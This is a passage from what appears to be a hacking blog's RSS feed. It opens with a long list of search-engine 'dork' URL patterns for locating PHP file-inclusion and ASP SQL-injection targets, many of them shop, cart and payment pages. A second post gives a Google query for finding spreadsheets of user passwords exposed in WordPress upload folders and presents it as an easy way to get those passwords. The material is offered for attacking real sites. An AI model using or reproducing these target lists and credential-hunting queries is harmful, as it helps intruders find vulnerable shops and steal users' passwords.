layout.php?numero=&#13;
tools/send_reminders.php?includedir=&#13;
module_db.php?pivot_path=&#13;
inc/cmses/aedatingCMS.php?dir[inc]=&#13;
modules/vwar/admin/admin.php?vwar_root=&#13;
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=&#13;
index.php?RP_PATH=&#13;
index.php?pagename=&#13;
smarty_config.php?root_dir=&#13;
components/com_forum/download.php?phpbb_root_path=&#13;
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=&#13;
classes/adodbt/sql.php?classes_dir=&#13;
send_reminders.php?includedir=&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=&#13;
inc/functions.inc.php?config[ppa_root_path]=&#13;
components/com_cpg/cpg.php?mosConfig_absolute_path=&#13;
admin/index.php?o=&#13;
index.php?menu=deti&amp;page=&#13;
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&#13;
m2f/m2f_phpbb204.php?m2f_root_path=&#13;
components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=&#13;
admin/doeditconfig.php?thispath=../includes&amp;config[path]=&#13;
components/com_simpleboard/image_upload.php?sbp=&#13;
wamp_dir/setup/yesno.phtml?no_url=&#13;
include/new-visitor.inc.php?lvc_include_dir=&#13;
support/mailling/maillist/inc/initdb.php?absolute_path=&#13;
coppercop/theme.php?THEME_DIR=&#13;
inc/header.php/step_one.php?server_inc=&#13;
inc/pipe.php?HCL_path=&#13;
include/new-visitor&#13;
"add.asp?bookid="&#13;
"add_cart.asp?num="&#13;
"addcart.asp?"&#13;
"addItem.asp"&#13;
"add-to-cart.asp?ID="&#13;
"addToCart.asp?idProduct="&#13;
"addtomylist.asp?ProdId="&#13;
"adminEditProductFields.asp?intProdID="&#13;
"advSearch_h.asp?idCategory="&#13;
"affiliate.asp?ID="&#13;
"affiliate-agreement.cfm?storeid="&#13;
"affiliates.asp?id="&#13;
"ancillary.asp?ID="&#13;
"archive.asp?id="&#13;
"article.asp?id="&#13;
"aspx?PageID"&#13;
"basket.asp?id="&#13;
"Book.asp?bookID="&#13;
"book_list.asp?bookid="&#13;
"book_view.asp?bookid="&#13;
"BookDetails.asp?ID="&#13;
"browse.asp?catid="&#13;
"browse_item_details.asp"&#13;
"Browse_Item_Details.asp?Store_Id="&#13;
"buy.asp?"&#13;
"buy.asp?bookid="&#13;
"bycategory.asp?id="&#13;
"cardinfo.asp?card="&#13;
"cart.asp?action="&#13;
"cart.asp?cart_id="&#13;
"cart.asp?id="&#13;
"cart_additem.asp?id="&#13;
"cart_validate.asp?id="&#13;
"cartadd.asp?id="&#13;
"cat.asp?iCat="&#13;
"catalog.asp"&#13;
"catalog.asp?CatalogID="&#13;
"catalog_item.asp?ID="&#13;
"catalog_main.asp?catid="&#13;
"category.asp"&#13;
"category.asp?catid="&#13;
"category_list.asp?id="&#13;
"categorydisplay.asp?catid="&#13;
"checkout.asp?cartid="&#13;
"checkout.asp?UserID="&#13;
"checkout_confirmed.asp?order_id="&#13;
"checkout1.asp?cartid="&#13;
"comersus_listCategoriesAndProducts.asp?idCategory ="&#13;
"comersus_optEmailToFriendForm.asp?idProduct="&#13;
"comersus_optReviewReadExec.asp?idProduct="&#13;
"comersus_viewItem.asp?idProduct="&#13;
"comments_form.asp?ID="&#13;
"contact.asp?cartId="&#13;
"content.asp?id="&#13;
"customerService.asp?TextID1="&#13;
"default.asp?catID="&#13;
"description.asp?bookid="&#13;
"details.asp?BookID="&#13;
"details.asp?Press_Release_ID="&#13;
"details.asp?Product_ID="&#13;
"details.asp?Service_ID="&#13;
"display_item.asp?id="&#13;
"displayproducts.asp"&#13;
"downloadTrial.asp?intProdID="&#13;
"emailproduct.asp?itemid="&#13;
"emailToFriend.asp?idProduct="&#13;
"events.asp?ID="&#13;
"faq.asp?cartID="&#13;
"faq_list.asp?id="&#13;
"faqs.asp?id="&#13;
"feedback.asp?title="&#13;
"freedownload.asp?bookid="&#13;
"fullDisplay.asp?item="&#13;
"getbook.asp?bookid="&#13;
"GetItems.asp?itemid="&#13;
"giftDetail.asp?id="&#13;
"help.asp?CartId="&#13;
"home.asp?id="&#13;
"index.asp?cart="&#13;
"index.asp?cartID="&#13;
"index.asp?ID="&#13;
"info.asp?ID="&#13;
"item.asp?eid="&#13;
"item.asp?item_id="&#13;
"item.asp?itemid="&#13;
"item.asp?model="&#13;
"item.asp?prodtype="&#13;
"item.asp?shopcd="&#13;
"item_details.asp?catid="&#13;
"item_list.asp?maingroup"&#13;
"item_show.asp?code_no="&#13;
"itemDesc.asp?CartId="&#13;
"itemdetail.asp?item="&#13;
"itemdetails.asp?catalogid="&#13;
"learnmore.asp?cartID="&#13;
"links.asp?catid="&#13;
"list.asp?bookid="&#13;
"List.asp?CatID="&#13;
"listcategoriesandproducts.asp?idCategory="&#13;
"modline.asp?id="&#13;
"myaccount.asp?catid="&#13;
"news.asp?id="&#13;
"order.asp?BookID="&#13;
"order.asp?id="&#13;
"order.asp?item_ID="&#13;
"OrderForm.asp?Cart="&#13;
"page.asp?PartID="&#13;
"payment.asp?CartID="&#13;
"pdetail.asp?item_id="&#13;
"powersearch.asp?CartId="&#13;
"price.asp"&#13;
"privacy.asp?cartID="&#13;
"prodbycat.asp?intCatalogID="&#13;
"prodetails.asp?prodid="&#13;
"prodlist.asp?catid="&#13;
"product.asp?bookID="&#13;
"product.asp?intProdID="&#13;
"product_info.asp?item_id="&#13;
"productDetails.asp?idProduct="&#13;
"productDisplay.asp"&#13;
"productinfo.asp?item="&#13;
"productlist.asp?ViewType=Category&amp;CategoryID= "&#13;
"productpage.asp"&#13;
"products.asp?ID="&#13;
"products.asp?keyword="&#13;
"products_category.asp?CategoryID="&#13;
"products_detail.asp?CategoryID="&#13;
"productsByCategory.asp?intCatalogID="&#13;
"prodView.asp?idProduct="&#13;
"promo.asp?id="&#13;
"promotion.asp?catid="&#13;
"pview.asp?Item="&#13;
"resellers.asp?idCategory="&#13;
"results.asp?cat="&#13;
"savecart.asp?CartId="&#13;
"search.asp?CartID="&#13;
"searchcat.asp?search_id="&#13;
"Select_Item.asp?id="&#13;
"Services.asp?ID="&#13;
"shippinginfo.asp?CartId="&#13;
"shop.asp?a="&#13;
"shop.asp?action="&#13;
"shop.asp?bookid="&#13;
"shop.asp?cartID="&#13;
"shop_details.asp?prodid="&#13;
"shopaddtocart.asp"&#13;
"shopaddtocart.asp?catalogid="&#13;
"shopbasket.asp?bookid="&#13;
"shopbycategory.asp?catid="&#13;
"shopcart.asp?title="&#13;
"shopcreatorder.asp"&#13;
"shopcurrency.asp?cid="&#13;
"shopdc.asp?bookid="&#13;
"shopdisplaycategories.asp"&#13;
"shopdisplayproduct.asp?catalogid="&#13;
"shopdisplayproducts.asp"&#13;
"shopexd.asp"&#13;
"shopexd.asp?catalogid="&#13;
"shopping_basket.asp?cartID="&#13;
"shopprojectlogin.asp"&#13;
"shopquery.asp?catalogid="&#13;
"shopremoveitem.asp?cartid="&#13;
"shopreviewadd.asp?id="&#13;
"shopreviewlist.asp?id="&#13;
"ShopSearch.asp?CategoryID="&#13;
"shoptellafriend.asp?id="&#13;
"shopthanks.asp"&#13;
"shopwelcome.asp?title="&#13;
"show_item.asp?id="&#13;
"show_item_details.asp?item_id="&#13;
"showbook.asp?bookid="&#13;
"showStore.asp?catID="&#13;
"shprodde.asp?SKU="&#13;
"specials.asp?id="&#13;
"store.asp?id="&#13;
"store_bycat.asp?id="&#13;
"store_listing.asp?id="&#13;
"Store_ViewProducts.asp?Cat="&#13;
"store-details.asp?id="&#13;
"storefront.asp?id="&#13;
"storefronts.asp?title="&#13;
"storeitem.asp?item="&#13;
"StoreRedirect.asp?ID="&#13;
"subcategories.asp?id="&#13;
"tek9.asp?"&#13;
"template.asp?Action=Item&amp;pid="&#13;
"topic.asp?ID="&#13;
"tuangou.asp?bookid="&#13;
"type.asp?iType="&#13;
"updatebasket.asp?bookid="&#13;
"updates.asp?ID="&#13;
"view.asp?cid="&#13;
"view_cart.asp?title="&#13;
"view_detail.asp?ID="&#13;
"viewcart.asp?CartId="&#13;
"viewCart.asp?userID="&#13;
"viewCat_h.asp?idCategory="&#13;
"viewevent.asp?EventID="&#13;
"viewitem.asp?recor="&#13;
"viewPrd.asp?idcategory="&#13;
"ViewProduct.asp?misc="&#13;
"voteList.asp?item_ID="&#13;
"whatsnew.asp?idCategory="&#13;
"WsAncillary.asp?ID"&#13;
</pre>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;838&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/dork-sql-2015-anonyviet/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/dorks1.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Exploiting Passwords stored on Websites with Google Dork</title>
		<link>https://en.anonyviet.com/exploiting-passwords-stored-on-websites-with-google-dork/</link>
					<comments>https://en.anonyviet.com/exploiting-passwords-stored-on-websites-with-google-dork/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 00:15:19 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[stored]]></category>
		<category><![CDATA[Websites]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7638</guid>

					<description><![CDATA[The instructions below will help you find the user password easily through google search engine and keywords Join the channel Telegram of the AnonyViet 👉 Link 👈 You guys come in http://google.com.vntype the command below: inurl:wp-content/uploads filetype:xls &#124; filetype:xlsx password Google will list us the excel files that store user passwords. My simple task is [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><img decoding="async" class="alignnone" src="data:image/jpeg;base64,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